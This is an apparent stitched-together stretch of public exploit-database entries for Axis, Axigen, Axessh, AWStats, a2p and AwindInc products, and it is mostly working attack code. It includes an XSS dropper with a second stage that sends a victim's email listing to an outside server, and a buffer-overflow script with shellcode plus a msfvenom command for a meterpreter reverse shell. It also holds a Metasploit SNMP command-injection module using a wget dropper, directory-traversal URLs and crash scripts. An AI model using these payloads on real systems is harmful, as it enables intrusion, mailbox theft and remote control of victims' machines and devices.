AXIS M3114-R         5.40.9.4      8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3114-VE        5.40.9.4      8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3203           5.50.3.1      7da467702db8b0e57ea5d237bd10ab61
AXIS M3204           5.50.3.1      7da467702db8b0e57ea5d237bd10ab61
AXIS M5013           5.50.3.1      9183b9ac91c3c03522f37fce1e6c2205
AXIS M5014           5.50.3.1      9183b9ac91c3c03522f37fce1e6c2205
AXIS M7010           5.50.4.1      84f618087151b0cc46398a6e0c6ebc0d
AXIS M7011           5.90.1        362658a55d4f2043ed435c72588bd7e7
AXIS M7014           5.50.4.1      84f618087151b0cc46398a6e0c6ebc0d
AXIS M7016           5.51.2.3      b3de957bbca166f145969a6884050979
AXIS P1204           5.50.6        3ffe1a771565b61567f917621c737866
AXIS P1214           5.50.6        3ffe1a771565b61567f917621c737866
AXIS P1224           5.50.6        3ffe1a771565b61567f917621c737866
AXIS P1343           5.40.9.8      9bbd08a92881b1b07e9f497a436b6a60
AXIS P1344           5.40.9.8      9bbd08a92881b1b07e9f497a436b6a60
AXIS P1346           5.40.9.6      c89ee1e7c54b4728612277e18be1c939
AXIS P1347           5.40.9.6      f0f95768e367c3a2a8999a0bd8902969
AXIS P1353           5.60.1.5      0f59d0e34301519908754af850fdfebb
AXIS P1354           5.90.1        120c230067b7e000fa31af674f207f03
AXIS P1355           5.60.1.5      5dbec1d7b8b6f337581da6ec668a9aad
AXIS P1357           5.90.1        d83472c4d545763e5b05cd6d0c63430f
AXIS P1364           5.85.4        2db00322be0b8c939c89fe4f3e0fd67d
AXIS P1365           5.75.3.2      1eba3426b2046e696d80ea253fe5e9b6
AXIS P1405           5.80.1.1      4db97061feb3cf91eb0cded516f9c5af
AXIS P1425           5.80.1.1      e9213ed81dc68f07c854a990889995ba
AXIS P1427           5.80.1.1      dfe4cd28b929e78d42e8fc8c98616a7c
AXIS P1428-E         5.80.1.1      7a65a0b0e4050824de0d46a1725ad0ea
AXIS P1435           5.85.4.1      219467e77dcb3195d7203a79ecd30474
AXIS P3214           6.10.1        00fca61c0a97dfc5e670a308cbda14d4
AXIS P3215           6.10.1        00fca61c0a97dfc5e670a308cbda14d4
AXIS P3224           6.10.1.1      5fae8852b7790cf6f66bb2356c60acd6
AXIS P3225           6.10.1.1      5fae8852b7790cf6f66bb2356c60acd6
AXIS P3301           5.40.9.4      27b7a421f7e3511f3a4b960c80b42c56
AXIS P3304           5.40.9.4      df9e2159c4eadf5e955863c7c5691b1a
AXIS P3343           5.40.9.8      dd752099f8b2c48b91914ec32484f532
AXIS P3344           5.40.9.8      dd752099f8b2c48b91914ec32484f532
AXIS P3346           5.50.3.1      d30498356187ba44f94f31398b04a476
AXIS P3353           5.60.1.4      fa4924480563924a0365268f8eef8864
AXIS P3354           6.10.1        d2f317d88dea1f001ce8151106e0322b
AXIS P3363           5.60.1.5      4b3175a30893a270e5dca8fc405b5d7e
AXIS P3364           6.10.1        6128c6ba026a68a5759b08971504807e
AXIS P3365           6.10.1        f26b0616c595622abb17ce4411dee2b2
AXIS P3367           6.10.1        8dad67aae2ffaee6fb147d6942476f00
AXIS P3384           6.10.1        138ff1bdc97d025f8f31a55e408e2a1d
AXIS P3904-R         5.80.1        0b420fa6e8b768cafd6fa6b5920883be
AXIS P3905-R         5.80.1        0b420fa6e8b768cafd6fa6b5920883be
AXIS P3915-R         5.80.1        1dcf4a39c7e7349629ade723f563e892
AXIS P5414-E         5.90.1        f5782c5dbe8dcffd7863b248a55682ee
AXIS P5415-E         5.90.1        f5782c5dbe8dcffd7863b248a55682ee
AXIS P5512           95.50.4.2     a2d5aab90d51af80d924bb3cc8b249fc
AXIS P5512-E         5.50.4.2      4fd5d721e27fe0f4db7d652bd1730749
AXIS P5514-E         5.85.3        b1fc3d26f6293b94f042ac6ea3aa8271
AXIS P5515           5.85.3        99b2512b57ed8a12c6ad2e53adc8acf8
AXIS P5515-E         5.85.3        639388e504a0841cad2eee7374476727
AXIS P5522           5.50.4.3      8335552031bc297ce87666542f0e3106
AXIS P5522-E         5.50.4.2      218e1b6997f0e5338f86f0ed1b12f8a0
AXIS P5532           5.41.3.1      b1ab3dd8ed126dd68b4793dec9bf3698
AXIS P5532-E         5.41.3.1      f6322413687d169dce61459d8338a611
AXIS P5534           5.40.9.5      3b94922050bec9bc436dce3fcd9bcfaf
AXIS P5534-E         5.40.9.6      a931bc58ee0e882b359dbecd3d699c52
AXIS P5544           5.41.2.2      cb5bcec36f839914db93eaf17ae83e5e
AXIS P5624-E         5.75.1.1      b93952a6083aa628026f145a1dffa313
AXIS P5635-E         5.75.1.1      24d32e4fab54f16b5698ff4e477fc188
AXIS P7210           5.50.4.1      b0e19f8837754ac73aa146b5710a12b1
AXIS P7214           5.50.4.1      b0e19f8837754ac73aa146b5710a12b1
AXIS P7216           5.51.2.1      a77e96832f7d87970bf286288ce2ca81
AXIS P7224           5.51.2.1      5d5ecf065f456e66eb42d9360d22f863
AXIS P8514           5.40.9.4      8d3eac43ad5c23626b75d5d7c928e29d
AXIS Q1615           5.80.1.3      8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635           5.80.1.3      8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635-E         5.80.1.3      8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1755           5.50.4.1      6ca8597f48ed122ce84c2172c079cdf9
AXIS Q1765-LE        5.90.1.1      7930bf5c4c947f2f948f8b7475f01409
AXIS Q1765-LE-PT     5.90.1.1      890ba75a8108d97f2ef1a4aecedf76b1
AXIS Q1775           5.85.3        f47bc9d46a913561e42b999cc6697a83
AXIS Q1910           5.50.4.1      71525d4d56d781318b64e8200806dcf0
AXIS Q1921           5.50.4.1      82f956fec96a9068941e24e12045cefd
AXIS Q1922           5.50.4.1      111a1a4f823e7281af1c872ba52f73c4
AXIS Q1931-E         5.75.1.3      5cf13a2c3d65644c3376ec6466dd9b49
AXIS Q1931-E-PT-Mount5.75.1.1      3ba7e187dc25e98ab73aef262b68e1b9
AXIS Q1932-E         5.75.1.2      b8efe54fc3eca7f2a59322779e63e8e1
AXIS Q1932-E PT.Mount5.75.1        513fc031f85542548eeccfeaa7c1a29e
AXIS Q2901-E         5.55.4.1      d2945717297edab3326179541cfa0688
AXIS Q2901-E PT.Mount5.55.4.1      a41aed45359f11d2ec248419c124a52d
AXIS Q3505           5.80.1.4      9394b3577bdb17cb9f74e56433a0e660
AXIS Q3709-PVE       5.75.1.1      e9fb87337c0a24139a40459336f0bcb3
AXIS Q6000-E         5.65.1.1      b97df19057db1134a43c26f5ddf484de
AXIS Q6032           5.41.1.2      8caad5cd7beeebaf5b05b011b8a1e104
AXIS Q6032-C         5.41.3        58213a4b1c7a980dcb3b54bbee657506
AXIS Q6032-E         5.41.1.4      b4aa977b254694b5d14d7e87e5652a6b
AXIS Q6034           5.41.1.1      4f44a8661534bac08a50651ee90a7d47
AXIS Q6034-C         5.41.3        25d455dc2e2d11639f29b0b381ddd7cb
AXIS Q6034-E         5.41.1.2      3bfab61354170e42ce27fc2477d57026
AXIS Q6035           5.41.1.2      9d124d096bf48fbfd2e11c34de3c880d
AXIS Q6035-C         5.41.3        42d23ae4d0b1456cc54e54734a586d53
AXIS Q6035-E         5.41.1.5      e2123a9e37fda4044847c810b7f25253
AXIS Q6042           5.70.1.1      4f253ed4bb0efaa4a845e0e9bd666766
AXIS Q6042-C         5.70.1.1      21bd154f706091b348c33dd9564438da
AXIS Q6042-E         5.70.1.2      9d5dc03268638498d0299bf466fa0501
AXIS Q6042-S         5.70.1.1      085fc5903d99899d78b48abb9cafdecd
AXIS Q6044           5.70.1.1      29e4cdb9ba2f18953512c5d1e17229c1
AXIS Q6044-C         5.70.1.1      dc3fc472b88e07278e6ff82eaee71a8d
AXIS Q6044-E         5.70.1.2      83d1e6c1fe5aa9c26710eed03721f928
AXIS Q6044-S         5.70.1.1      654ffd048fdb41ae3c86da4f41e2a31d
AXIS Q6045           5.70.1.1      2db9b247729e9487f476a35a6dd456ce
AXIS Q6045-C         5.70.1.1      9bb561126e2b4f69ac526cfccdf254f6
AXIS Q6045-C-MkII    5.70.1.1      2c9efccb0fba0e63fc4fff73e6ba0fea
AXIS Q6045-E         5.70.1.2      321a5d906863787fdc5e34483e6ec2a8
AXIS Q6045-E-MkII    5.70.1.2      d9d4242a83b1ed225dd3c20530da034d
AXIS Q6045-MkII      5.70.1.1      686f0fe8727e2a726091c9ddf3827741
AXIS Q6045-S         5.70.1.1      43473e42f360efb4ea6f84da35fd9746
AXIS Q6045-S-Mk-II   5.70.1.1      d747a5a3d69264af8448f72822e8d60b
AXIS Q6114-E         5.65.2.1      8cb9a3a88c79ebb2cf5def3cda0da148
AXIS Q6115-E         5.65.2.1      7d2dd3410ce505cd04a1c182917523a5
AXIS Q6128-E         5.85.2.1      49508ff56508f809a75d367896e8d56f
AXIS Q7401           5.50.4        99855c6c9777fdd5fc5e58349ae861a5
AXIS Q7404           5.50.4.2      ffdbee7c9daad303e89a432ba9c4711d
AXIS Q7404           5.50.4        6e31e9709cf9717968c244267aa8c6d0
AXIS Q7406           5.51.2        3cdb7935278157b9c91c334613012b1e
AXIS Q7411           5.90.1        26893adedcfc1953829084e8e7c3fbdd
AXIS Q7414           5.51.2        8ff659a8db077b545205f56dfef217d4
AXIS Q7424-R         5.50.4        d570ef1886c84ab53934fc51385e8aa7
AXIS Q7424-R-MkII    5.51.3        964a13f6b1aef17562cbbde11d936dee
AXIS Q7436           5.90.1        8fe1ef95b231bf6f771c3edc0fbc8afd
AXIS Q8414-LVS       6.10.1        9529cd9cf3b3bd66bec22c0b1c7448cd
AXIS Q8631-E         5.75.1        c7f882afc268ca3d60d07d5770db6a51
AXIS Q8632-E         5.75.1        f01d9a86d21335fe3d78e634858b9e77
AXIS Q8665-LE        5.90.1.1      1549b56d34250a93bbcf7b24b4f63699
AXIS V5915           5.75.1.1      a1c39a9cd545091825001a831d0c1ea4


Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the Vendor, tickets were opened to correct this issue.

Credits
+++++++
These vulnerabilities have been discovered and published by Orwelllabs.


Timeline
++++++++
2015-09-10: First attempt to contact Vendor
2015-10-30: Vulnerability was reported to CERT
2015-11-30: CVE-IDs are assigned
2016-07-25: Since the first vulnerability was published (09.04.2016 -
EDB-ID: 39683), a long conversation about these vulnerabilities has taken
place with the manufacturer. We have maintained communication from
15/04/2016 until now. As there is still disagreement regarding the
vulnerabilities (and botnets in the wild: https://goo.gl/k79I8u), we
decided to publish this advisory, since all deadlines have already been
exhausted.


Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.


About Orwelllabs
++++++++++++++++
# Loadind k4fK43sQu3 m0dule...
            
# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
# Dork: n/a
# Date: 2018-10-11
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://axiositalia.it/
# Software Link: http://axiositalia.it/?page_id=1907
# Version: 1.7.0/7.0.0
# Category: Webapps
# Platform: ASPX
# CVE: N/A
 
# POC:
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=
            
source: https://www.securityfocus.com/bid/56343/info

Axigen Mail Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied data.

A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to obtain sensitive information, cause a denial of service condition, or execute arbitrary code with the privileges of the application. This could help the attacker launch further attacks. 

http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini

http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini 
            
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - RedTeamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older version of Axigen WebMail
# Tested on: firefox, chrome
# CVE: CVE-2023-48974

Description

The `serverName_input` parameter is vulnerable to stored cross-site
scripting (XSS) due to unsanitized or unfiltered processing. This means
that an attacker can inject malicious code into this parameter, which will
then be executed by other users when they view the page where the parameter
is used. This affects authenticated administrators, and the attack can be
used against other administrators with more permissions.

Exploitation

1. Login as administrator
2. Navigate to "global settings"
3. Change server name to <script>alert(1)</script>

PoC of the POST request:

```
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true;
WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
menuLeftTopPosition=-754
Content-Type: multipart/form-data;
boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="serverName_input"

<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"

axigen
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"

--SNIP--

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"

Save Configuration
-----------------------------41639384187581032291088896642--
```



#______________________________
#Vinnie McRae
#RedTeamer IT Security
#Blog: redteamer.de/blog-beitrag/
            
# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Date: 2023-08-21
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.0–4370c946) and older version of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470

Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.

Dropper code
This dropper code loads and executes JavaScript exploit code from a remote
server.

');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
  document.body.appendChild(x)
})//



Encoded form

/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//


Exploit code

// Review note: second stage pulled in by the dropper shown above; it runs
// inside the webmail origin once the reflected XSS fires. As the code below
// shows, it learns the session handle from the redirect URL of GET /, PATCHes
// conversation "MQ" to obtain a folderId, lists that folder's conversations,
// and reports to oob_server by pointing an injected <script> element at it
// with the listing base64-encoded in the query string; a 401 on the PATCH is
// reported as "session_expired" instead.
// Defender notes: the report is a cross-origin script load to a host the page
// never references legitimately, so a Content-Security-Policy with a
// restrictive script-src (plus a report endpoint) both blocks and surfaces
// it; server side, a PATCH to /api/v1/conversations/MQ immediately followed
// by a folder listing from a page context is the request pair worth alerting
// on. The root cause is the reflected parameter shown in the encoded form
// above, not this script. Line breaks inside statements below are the
// advisory's own wrapping and are left untouched.
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');

// Step 1: the session handle is recovered from wherever GET / redirects to.
xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
        // Takes the text after the first "=" in the redirect URL's query
        // string; nothing checks that this is actually the _h parameter.
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
            if (xhr2.readyState === XMLHttpRequest.DONE) {
                if (xhr2.status === 401){
                    // Session no longer valid: only the domain is reported.
                    script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
                    document.body.appendChild(script_tag);
                } else {
                    // The PATCH response is used only to learn the folderId
                    // of the first mail in the conversation.
                    resp = xhr2.responseText;
                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
                    xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
                    xhr3.onreadystatechange = () => {
                        if (xhr3.readyState === XMLHttpRequest.DONE) {
                            // Raw listing leaves the origin via the script
                            // element's src; this is the load CSP can block.
                            emails = xhr3.responseText;
                            script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                            document.body.appendChild(script_tag);
                        }
                    };
                    xhr3.send();
                }
            }
        };
        // Side effect on the victim's mailbox: conversation MQ is marked read.
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
    }
};
xhr1.send();


Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.
            
[+] Credits: John Page aka hyp3rlinx	

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt

[+] ISR: ApparitionSec



Vendor:
============
www.labf.com



Product:
=============
Axessh 4.2.2

Axessh is an SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without
sacrificing any of its existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding 



Vulnerability Type:
====================
Denial Of Service

AxeSSH will crash after receiving an overly long payload of junk...



Exploit code(s):
===============

1) Open the settings window for axessh and choose Run, then click Run as EXE; this will launch "xwpsshd.exe", which
crashes with a bad protocol version.


import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"

ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)



Exploitation Technique:
=======================
Remote



Severity Level:
================
Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
            
# Title: Axessh 4.2 - 'Log file name'  Local Stack-based Buffer Overflow
# Date: May 23rd, 2019
# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
# Vendor Homepage: http://www.labf.com
# Software Link: http://www.labf.com/download/axessh.exe
# Version v4.2
# Tested on: Windows 7 SP1 EN (x86)
# Reference: https://www.exploit-db.com/exploits/46858

# TO RUN:
# 0. Setup a multi/handler listener
# 1. Run python script
# 2. Copy contents of axssh.txt
# 3. Open telnet_S.exe
# 4. Select Details >> Settings >> Logging
# 5. Select Log all Session Output radio button
# 6. Paste the contents in Log file name
# 7. Press "OK"
# 8. Press "OK"

# EIP offset: 214
# 0x050e3f04 : push esp # ret  | ascii {PAGE_EXECUTE_READ} [ctl3d32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v2.31.000 (C:\Windows\system32\ctl3d32.dll)


#77da395c - Address of LoadLibraryA() for Windows 7 SP1 x86
#777db16f - Address of system() for Windows 7 SP1 x86
#77da214f - Address of ExitProcess for Windows 7 SP1 x86

# Shellcode Reference: https://www.exploit-db.com/shellcodes/46281
# Payload command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.163 LPORT=4444 EXITFUNC=seh -f msi > /var/www/html/ms.msi
# When the payload runs, it floods the system with Command windows and sends back a meterpreter shell. The shell does not die even if the user closes the application.


filename = "axssh.txt"

msiScode = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xda\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x20\x2f\x71\x6e\x68\x2e\x6d\x73\x69\x68\x33\x2f\x6d\x73\x68\x36\x2e\x31\x36\x68\x38\x2e\x31\x32\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x2f\x69\x20\x68\x68\x78\x65\x63\x20\x68\x6d\x73\x69\x65\x89\xe7\x57\xb8\x6f\xb1\x7d\x77\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xda\x77"

evilString = "\x90" * 110 + msiScode + "\x90" * 6 + "\x04\x3f\x0e\x05" + "\x90"*4 + "\x89\xE0\x83\xE8\x7F\x89\xC4\xEB\x81" + "\x90" * 800

file = open(filename,'w')
file.write(evilString)
file.close()
            
#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-14
#Vendor Homepage: http://www.labf.com
#Software Link: http://www.labf.com/download/axessh.exe
#Tested Version: 4.2
#Tested on: Windows 7 Service Pack 1 x32

#Steps to produce the crash:
#1.- Run python code: Axessh_4.2.py
#2.- Open Axess.txt and copy content to clipboard
#3.- Open Axessh.exe
#4.- In "Telnet Connect Host" select "Details>>" > "Settings"
#5.- Select "Logging" and enable "Log all sessions output"
#6.- In "Log file name" paste Clipboard
#7.- Select "OK" and in "Telnet Connect Host" select "Ok"
#8.- Crashed

cod = "\x41" * 500

f = open('Axess.txt', 'w')
f.write(cod)
f.close()
            
source: https://www.securityfocus.com/bid/49749/info

AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

AWStats 7.0 and 6.95 are vulnerable; other versions may also be affected. 

http://example.com/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://example.com/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E
            
# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
# Author: Todor Donev
# Date: 2018-07-11
# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
# Version: 1.007-5
# CVE: N/A
# Tested on: CentOS 6.9, Ubuntu 10

[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
Segmentation fault
[todor@adamantium ~]$ gdb a2p --quiet
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install *SNIPED*
(gdb) r bof
Starting program: /usr/bin/a2p bof
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x0074ee65 in fgets () from /lib/libc.so.6
(gdb) info reg
eax            0x1060	4192
ecx            0x1	1
edx            0x41414141	1094795585
ebx            0x880ff4	8916980
esp            0xbffff0f0	0xbffff0f0
ebp            0xbffff118	0xbffff118
esi            0x41414141	1094795585
edi            0x8062920	134621472
eip            0x74ee65	0x74ee65 <fgets+53>
eflags         0x210216	[ PF AF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb)
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "AwindInc SNMP Service Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
        A valid SNMP read-write community is required to exploit this vulnerability.

        The following devices are known to be affected by this issue:

          * Crestron Airmedia AM-100 <= version 1.5.0.4
          * Crestron Airmedia AM-101 <= version 2.5.0.12
          * Awind WiPG-1600w <= version 2.0.1.8
          * Awind WiPG-2000d <= version 2.1.6.2
          * Barco wePresent 2000 <= version 2.1.5.7
          * Newline Trucast 2 <= version 2.1.0.5
          * Newline Trucast 3 <= version 2.1.3.7
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
        ],
      'References'     =>
        [
          ['CVE', '2017-16709'],
          ['URL', 'https://github.com/QKaiser/awind-research'],
          ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
        ],
      'DisclosureDate' => '2019-03-27',
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => true,
      'Targets'        => [
        ['Unix In-Memory',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
          'Type'        => :unix_memory,
          'Payload'     => {
            'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'}
          }
        ],
        ['Linux Dropper',
          'Platform'    => 'linux',
          'Arch'        => ARCH_ARMLE,
          'CmdStagerFlavor' => %w[wget],
          'Type'        => :linux_dropper
        ]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))

    register_options(
      [
        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
      ])
  end


  def check
    begin
      connect_snmp
      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
      print_status("Target system is #{sys_description}")
      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
      model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
      case model
      when 'AM-100', 'AM-101'
          return CheckCode::Vulnerable
      else
          # TODO: insert description check for other vulnerable models (that I don't have)
          # In the meantime, we return 'safe'.
          return CheckCode::Safe
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
    Exploit::CheckCode::Unknown
  end

  def inject_payload(cmd)
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Injection successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def trigger
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Trigger successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, opts = {})
    # The payload must start with a valid FTP URI otherwise the injection point is not reached
    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"

    # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
    # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
    # keep our reverse shell opened :)
    cmd << "$(pkill -f /etc/reboot.sh)"

    # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
    cmd << "A" * (255-cmd.length)

    # we inject our payload in camFWUpgradeFTPURL
    print_status("Injecting payload")
    inject_payload(cmd)

    # we trigger the firmware download via FTP, which will end up calling this
    # "/bin/getRemoteURL.sh %s %s %s %d"
    print_status("Triggering call")
    trigger
  end
end
            
source: https://www.securityfocus.com/bid/49187/info

awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

